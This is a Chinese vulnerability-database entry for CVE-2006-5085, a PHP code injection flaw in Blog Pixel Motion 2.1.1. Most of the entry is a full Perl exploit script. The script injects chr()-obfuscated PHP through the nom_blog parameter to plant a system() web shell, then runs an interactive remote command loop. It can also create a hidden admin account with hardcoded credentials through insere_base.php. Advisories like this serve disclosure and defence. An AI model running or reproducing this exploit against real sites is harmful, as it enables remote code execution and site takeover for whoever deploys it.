Blog Pixel Motion 'config.php'静态代码注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111155 漏洞类型 输入验证
发布时间 2006-09-27 更新时间 2006-10-19
CVE编号 CVE-2006-5085 CNNVD-ID CNNVD-200609-525
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2441
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-525
|漏洞详情
BlogPixelMotion的config.php中存在静态代码注入漏洞,远程攻击者可以通过注入include/variable.php中的nom_blog参数执行任意PHP代码。
|漏洞EXP
#!/usr/bin/perl
#
# Affected.scr..: Blog Pixel Motion V2.1.1
# Poc.ID........: 12060927
# Type..........: PHP Code Execution (stripslashes), SQL Injection (urldecode)
# Risk.level....: High
# Vendor.Status.: Unpatched
# Src.download..: www.pixelmotion.org/zip/blog2.1.zip
# Poc.link......: acid-root.new.fr/poc/12060927.txt
# Credits.......: DarkFig
#
# print "This exploit is for educational purpose only" x 999; exit;
#
use LWP::UserAgent;
use HTTP::Request::Common;
use HTTP::Response;
use Getopt::Long;
use strict;

print STDOUT "\n+", '-' x 60, "+\n";
print STDOUT "| Blog Pixel Motion V2.1.1 PHP Code Execution / Create Admin |\n";
print STDOUT '+', '-' x 60, "+\n";

my($host,$path,$proxh,$proxu,$proxp,$choice,$cmd,$res,$re);
my $opt = GetOptions(
   'host=s'   =>  \$host,
   'path=s'   =>  \$path,
   'proxh=s'  =>  \$proxh,
   'proxu=s'  =>  \$proxu,
   'proxp=s'  =>  \$proxp,
   'choice=s' =>  \$choice);

if(!$host) {
    print STDOUT "|      Usage: ./zz.pl --host=[www] --path=[/] --choice=[0]   |\n";
    print STDOUT "|   [Choice.]  1=PHP_Code_Execution       2=Create_Admin     |\n";
    print STDOUT "|   [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd]      |\n";
    print STDOUT '+', '-' x 60, "+\a\n";
    exit(1);
}

if($host  !~ /http/) {$host = 'http://'.$host;}
if($proxh !~ /http/ && $proxh != '') {$proxh = 'http://'.$proxh.'/';}
if(!$path) {$path = '/';}
if(!$choice) {$choice = 2;}

my $ua = LWP::UserAgent->new();
   $ua->agent('0xzilla');
   $ua->timeout(30);
   $ua->proxy(['http'] => $proxh) if $proxh;
   $re->proxy_authorization_basic($proxu, $proxp) if $proxp;

if($choice == 1) {

   $re = POST $host.$path.'config.php', [
   'nom_blog'  => '";
    $shcode  = chr(0x69).chr(0x66).chr(0x28).chr(0x69).chr(0x73).chr(0x73).chr(0x65);
    $shcode .= chr(0x74).chr(0x28).chr(0x24).chr(0x5F).chr(0x47).chr(0x45).chr(0x54);
    $shcode .= chr(0x5B).chr(0x27).chr(0x63).chr(0x6D).chr(0x64).chr(0x27).chr(0x5D);
    $shcode .= chr(0x29).chr(0x29).chr(0x7B).chr(0x73).chr(0x79).chr(0x73).chr(0x74);
    $shcode .= chr(0x65).chr(0x6D).chr(0x28).chr(0x73).chr(0x74).chr(0x72).chr(0x69);
    $shcode .= chr(0x70).chr(0x73).chr(0x6C).chr(0x61).chr(0x73).chr(0x68).chr(0x65);
    $shcode .= chr(0x73).chr(0x28).chr(0x24).chr(0x5F).chr(0x47).chr(0x45).chr(0x54);
    $shcode .= chr(0x5B).chr(0x27).chr(0x63).chr(0x6D).chr(0x64).chr(0x27).chr(0x5D);
    $shcode .= chr(0x29).chr(0x29).chr(0x3B).chr(0x7D).chr(0x0D).chr(0x0A);
    eval($shcode); die(); //'];
    $ua->request($re);

    while(<STDIN>){
    chomp($cmd = $_);
    if($cmd eq 'exit') { exit(0); }
    $re = GET $host.$path.'include/variables.php?cmd='.$cmd;
    $res = $ua->request($re);
    print STDOUT "\n\n".$res->content."\n\$sh: ";
    }


} else {

  $re = GET $host.$path.'insere_base.php?login=woot&pass=t00w';
  $ua->request($re);
  print STDOUT "[+] Admin login.: woot\n";
  print STDOUT "[+] Admin passwd: t00w\n";
  print STDOUT '+', '-' x 60, "+\n";

}

# milw0rm.com [2006-09-27]
|参考资料

来源:XF
名称:blog-pixel-motion-config-code-execution(29217)
链接:http://xforce.iss.net/xforce/xfdb/29217
来源:BID
名称:20235
链接:http://www.securityfocus.com/bid/20235
来源:BUGTRAQ
名称:20060927BlogPixelMotionV2.1.1PHPCodeExecution/CreateAdminExploit
链接:http://www.securityfocus.com/archive/1/archive/1/447167/100/0/threaded
来源:SECUNIA
名称:22163
链接:http://secunia.com/advisories/22163
来源:MISC
链接:http://acid-root.new.fr/poc/12060927.txt
来源:SREASON
名称:1653
链接:http://securityreason.com/securityalert/1653